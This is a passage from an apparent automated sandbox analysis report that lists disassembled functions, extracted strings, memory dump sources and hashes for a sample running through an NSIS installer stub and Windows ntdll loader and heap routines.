                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5B
                                  • Part of subcall function 004065D1: CharNextW.USER32(?,00403897,00434000,?,00434000,00000000), ref: 004065E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                • API String ID: 1152188737-334447862
                                • Opcode ID: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                • Instruction ID: 07a9971b8f29bbd68b878d9119023e68a6b74827d1d77f0d98df9434206269f1
                                • Opcode Fuzzy Hash: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                • Instruction Fuzzy Hash: 4FD137712043116AD7207F619D46B6B3AACAB4574AF51443FF582B62D2DBBC8E408B2E
                                Function 32DE9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $ $0
                                • API String ID: 3446177414-3352262554
                                • Opcode ID: c3f1a9b4ec0145d7d62b64dd9d8a562df837999586a2543fb62478fd59e850e2
                                • Instruction ID: 479d4f4a5d93cca81dcf756d84b247687f4dda00c4a85924a443954e19eab5e0
                                • Opcode Fuzzy Hash: c3f1a9b4ec0145d7d62b64dd9d8a562df837999586a2543fb62478fd59e850e2
                                • Instruction Fuzzy Hash: BE32E4B56093818FE350CF68C484B9ABBE5BF88348F40492EF9DA87350DB75D949CB52
                                Function 32DEFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                • API String ID: 3446177414-1700792311
                                • Opcode ID: fb89dca89f95c9655674f290286d8ae13d5cf77873c3ebdc74a09b985e104863
                                • Instruction ID: 1d8b77a2ba6d03b74202cac146cc0f13f5b6a3e54bc60f5d7548acdeb6c2becc
                                • Opcode Fuzzy Hash: fb89dca89f95c9655674f290286d8ae13d5cf77873c3ebdc74a09b985e104863
                                • Instruction Fuzzy Hash: 44D12136501685EFDB06CFA4E400AADBBF1FF09305F46C489E585AB751CB36E985CB24
                                Function 004066F4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406613: lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406667
                                  • Part of subcall function 00406613: GetFileAttributesW.KERNEL32(00425A48,00425A48), ref: 00406678
                                • DeleteFileW.KERNEL32(?,?,00000000,76073420,?), ref: 00406720
                                • lstrcatW.KERNEL32(00425248,\*.*,00425248,?,00000000,?,00000000,76073420,?), ref: 00406772
                                • lstrcatW.KERNEL32(?,004082B0,?,00425248,?,00000000,?,00000000,76073420,?), ref: 00406793
                                • lstrlenW.KERNEL32(?), ref: 00406796
                                • FindFirstFileW.KERNEL32(00425248,?), ref: 004067AD
                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 0040683E
                                • FindClose.KERNEL32(00000000), ref: 00406850
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                • String ID: \*.*
                                • API String ID: 2636146433-1173974218
                                • Opcode ID: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction ID: ed3bb2814488eceec14de134e67e78f5f853c3bf88eed2e9a0dc8686b927a400
                                • Opcode Fuzzy Hash: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction Fuzzy Hash: E841193210671069D7207B399D45A6B76E8DF81318F12453FF883B21D1EB7C8C6686AF
                                Function 32DE86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                • API String ID: 0-2515994595
                                • Opcode ID: 31cb590bdc666523f624b6424c69803e8fc005486d6a8d057910701aa0093944
                                • Instruction ID: 2661c0fe1b318f17cd540642279ddbf14bdf24749d66b6b2673132fd18c90e74
                                • Opcode Fuzzy Hash: 31cb590bdc666523f624b6424c69803e8fc005486d6a8d057910701aa0093944
                                • Instruction Fuzzy Hash: DF515CB55043559BE325CF18B980B9BBBE8EB84354F50491DBEAAC3360EB70D644CBD2
                                Function 32DEF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                • API String ID: 3446177414-1745908468
                                • Opcode ID: f438a25e95da8d7abdbaed0418567346d2f863160eb408fc6a7a83fa05c367c0
                                • Instruction ID: 01bad9e75052d64abf487140aaa45f1599161d53624881d67a9f9bddeff6ef56
                                • Opcode Fuzzy Hash: f438a25e95da8d7abdbaed0418567346d2f863160eb408fc6a7a83fa05c367c0
                                • Instruction Fuzzy Hash: A7913236901748DFEB02CFA8D440A9DBBF2FF49394F448449E486AF351CB7A9981CB60
                                Function 32D3640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                Download Yara Rule
                                APIs
                                • RtlDebugPrintTimes.NTDLL ref: 32D3651C
                                  • Part of subcall function 32D36565: RtlDebugPrintTimes.NTDLL ref: 32D36614
                                  • Part of subcall function 32D36565: RtlDebugPrintTimes.NTDLL ref: 32D3665F
                                Strings
                                • apphelp.dll, xrefs: 32D36446
                                • LdrpInitShimEngine, xrefs: 32D99783, 32D99796, 32D997BF
                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 32D9977C
                                • minkernel\ntdll\ldrinit.c, xrefs: 32D997A0, 32D997C9
                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32D99790
                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 32D997B9
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-204845295
                                • Opcode ID: f870e6517864594a43ed09042726a61ee8a81f0e8a915390a2e55da42cb0a77a
                                • Instruction ID: b44b9cae351fab2e89a8bcf14e2e0a91396fe8ccb2cc044fc1d482ebfc42e916
                                • Opcode Fuzzy Hash: f870e6517864594a43ed09042726a61ee8a81f0e8a915390a2e55da42cb0a77a
                                • Instruction Fuzzy Hash: 0E519C716493049FE315CF20D991EDB77E8EB84748F800929F69597360EA70D944CBA6
                                Function 32D3D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                • API String ID: 0-3532704233
                                • Opcode ID: 90a9d526150727dcbb891bd3f467fdc0a3e6dba2a98e839c0ab3ea852306a811
                                • Instruction ID: afe064e5c610e604e19545ad6123d728e7bbde2f56f672567979862b3232aa3f
                                • Opcode Fuzzy Hash: 90a9d526150727dcbb891bd3f467fdc0a3e6dba2a98e839c0ab3ea852306a811
                                • Instruction Fuzzy Hash: F1B17AB69093859FD716CF24C480B5FB7E8AB88758F41492EFA8497314DB70D908CFA2
                                Function 32D6D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                Download Yara Rule
                                APIs
                                • RtlDebugPrintTimes.NTDLL ref: 32D6D879
                                  • Part of subcall function 32D44779: RtlDebugPrintTimes.NTDLL ref: 32D44817
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-1975516107
                                • Opcode ID: 1dd6706b2d5e875ed6d02a857b940f0803998f08c1bc6052645085db54afdcc9
                                • Instruction ID: 04e37ebb20086ca366ea721e571b27ce0b8449a75225fb671915a1c82a6f5c60
                                • Opcode Fuzzy Hash: 1dd6706b2d5e875ed6d02a857b940f0803998f08c1bc6052645085db54afdcc9
                                • Instruction Fuzzy Hash: 80510175A403498FEB04CFA4D4857AEBBB1BF48308FA44459D9017B385DBB0A9C6CBE0
                                Function 32D3D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                • @, xrefs: 32D3D2B3
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 32D3D263
                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 32D3D136
                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 32D3D06F
                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 32D3D0E6
                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 32D3D202
                                • @, xrefs: 32D3D09D
                                • @, xrefs: 32D3D24F
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                • API String ID: 0-1356375266
                                • Opcode ID: 467ab94b96184bd488c33287e5ef0e469781beb5e9c2793634b8b3f9bba0b422
                                • Instruction ID: 908fe69349fc398e80f5008f2c006a45e9453151f9b0c925ab685df713991850
                                • Opcode Fuzzy Hash: 467ab94b96184bd488c33287e5ef0e469781beb5e9c2793634b8b3f9bba0b422
                                • Instruction Fuzzy Hash: 41A14FB25093459FE361CF21D484B9BB7E8BF88755F11492EFA8896340DB74D908CFA2
                                Function 32DC8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                Download Yara Rule
                                Strings
                                • VerifierFlags, xrefs: 32DC88D0
                                • AVRF: -*- final list of providers -*- , xrefs: 32DC880F
                                • HandleTraces, xrefs: 32DC890F
                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 32DC86BD
                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 32DC86E7
                                • VerifierDlls, xrefs: 32DC893D
                                • VerifierDebug, xrefs: 32DC8925
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                • API String ID: 0-3223716464
                                • Opcode ID: e3cd27522b3142753508dc80267ec9cfdc7cf4834aabc7f335e58c6d575adff6
                                • Instruction ID: 403b872def4640dbbea4ffbe7d40fc558068b0be3b9728a209660356ec9dc8f6
                                • Opcode Fuzzy Hash: e3cd27522b3142753508dc80267ec9cfdc7cf4834aabc7f335e58c6d575adff6
                                • Instruction Fuzzy Hash: 55914571946765EFE313CF64A881F6A77A8BF44708F810968FA84AB350DB70DC45CBA1
                                Function 32D6237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                • apphelp.dll, xrefs: 32D62382
                                • LdrpDynamicShimModule, xrefs: 32DAA7A5
                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 32DAA79F
                                • minkernel\ntdll\ldrinit.c, xrefs: 32DAA7AF
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-176724104
                                • Opcode ID: e5bc0acc30d9d9963d9a5c64a9e6dbb44b54414055ae827722c9ae544737dd3c
                                • Instruction ID: 84d351afae89f8bc5bd2a1517733b902f28b41299a26bee202bf2208b4d7d509
                                • Opcode Fuzzy Hash: e5bc0acc30d9d9963d9a5c64a9e6dbb44b54414055ae827722c9ae544737dd3c
                                • Instruction Fuzzy Hash: BD312676A41385EFE7049F28C896E5A77B4FB84705F98095DEA007B350DBB098C2CBD0
                                Function 32D3F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-523794902
                                • Opcode ID: bd2d5fab06deb0544255afc975de735f64acb60969ecd73f3c50bc91eddb254e
                                • Instruction ID: 42e13dd6a7525e81c685b20f7692ed0722532cb0dc9efc3487b164d3b70a0275
                                • Opcode Fuzzy Hash: bd2d5fab06deb0544255afc975de735f64acb60969ecd73f3c50bc91eddb254e
                                • Instruction Fuzzy Hash: B942F07520A3859FD306CF28C880B6ABBE5FF88348F544969F985CB351DB74D845CB62
                                Function 32D5B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                • API String ID: 0-122214566
                                • Opcode ID: 651b9eb4e3cadb4ecf7f292ce5058be40bebcdb480fab1a657ea97d7d4d49f7f
                                • Instruction ID: 53657bd50c660ac3723e8648f8279c59425f38b592565f29a71a2d2b7378d728
                                • Opcode Fuzzy Hash: 651b9eb4e3cadb4ecf7f292ce5058be40bebcdb480fab1a657ea97d7d4d49f7f
                                • Instruction Fuzzy Hash: 85C12675A00355ABEF088B64D891BBEB7A1AF45348F648069EC41EB394DFF4DD44C3A0
                                Function 32D7631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-792281065
                                • Opcode ID: 96ea23673a1cb3c73f61ab1886408c1c5d407463cb34979150fc4665ced27ea9
                                • Instruction ID: bba5015406ecd7e3dced8b589519b903960998aa8192443e13933dc858eaedd1
                                • Opcode Fuzzy Hash: 96ea23673a1cb3c73f61ab1886408c1c5d407463cb34979150fc4665ced27ea9
                                • Instruction Fuzzy Hash: F9917E70A06358DFFB15CF24C869B9E37A0EF04759F540069EA517B380EBB49881CBE0
                                Function 32D7C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                Download Yara Rule
                                Strings
                                • Loading import redirection DLL: '%wZ', xrefs: 32DB7F7B
                                • LdrpInitializeProcess, xrefs: 32D7C5E4
                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 32DB7FF0
                                • minkernel\ntdll\ldrredirect.c, xrefs: 32DB7F8C, 32DB8000
                                • LdrpInitializeImportRedirection, xrefs: 32DB7F82, 32DB7FF6
                                • minkernel\ntdll\ldrinit.c, xrefs: 32D7C5E3
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-475462383
                                • Opcode ID: 3eca4299046b60edc5a0ca185a435794e35a1e5850d476142dd5685462c413cb
                                • Instruction ID: 59bc475fd2d928ad787930d21726769e4793cbcb11525f94100259dd395aedd9
                                • Opcode Fuzzy Hash: 3eca4299046b60edc5a0ca185a435794e35a1e5850d476142dd5685462c413cb
                                • Instruction Fuzzy Hash: 6A3105B56053419FD314DF28E855E2BB7D4EF88B18F400958F985AB391EA64DC09CBF2
                                Function 32D50680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-4253913091
                                • Opcode ID: deb0fe9308b3aeca83cba5d8e19f24a60948f5b9cf472687265c654d657a09ff
                                • Instruction ID: c4887eebc0b0d5c1d57f8788d5372222dc457446559fdb7734ed8fdce6c1fe63
                                • Opcode Fuzzy Hash: deb0fe9308b3aeca83cba5d8e19f24a60948f5b9cf472687265c654d657a09ff
                                • Instruction Fuzzy Hash: B6F1AD74A00605DFEB05CF68D890F6AB7B5FF48345F2481A9E8559B381DBB4E981CFA0
                                Function 32D69723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                • API String ID: 3446177414-2283098728
                                • Opcode ID: 0d399306e362edb4c3aca9c943e39066e495c222e23252eca13fe65036198196
                                • Instruction ID: 68437ee62938dc9041ba674569c4bbac2a4e32c16b1a3f347161fbd60bb2f85a
                                • Opcode Fuzzy Hash: 0d399306e362edb4c3aca9c943e39066e495c222e23252eca13fe65036198196
                                • Instruction Fuzzy Hash: 4A5136757013019FE715DF38C884BB9F3A1BB8431CF940A2DE9929B791DBB09845CBA1
                                Function 32D7C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • LdrpInitializePerUserWindowsDirectory, xrefs: 32DB80E9
                                • Failed to reallocate the system dirs string !, xrefs: 32DB80E2
                                • minkernel\ntdll\ldrinit.c, xrefs: 32DB80F3
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-1783798831
                                • Opcode ID: f78fe95cf142d5506df1a7123849483f2830e43a3a0d4a0cf30b24955be2db1b
                                • Instruction ID: f0210c8b47e255508c12537f8487bf308e87f93fb093c27b7f97634310a27ca6
                                • Opcode Fuzzy Hash: f78fe95cf142d5506df1a7123849483f2830e43a3a0d4a0cf30b24955be2db1b
                                • Instruction Fuzzy Hash: AD4125B5546344AFDB11DF28DC45B4B37E8EF44791F50482ABA88E3360EBB4D885CBA1
                                Function 32DC43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • LdrpCheckRedirection, xrefs: 32DC450F
                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32DC4508
                                • minkernel\ntdll\ldrredirect.c, xrefs: 32DC4519
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
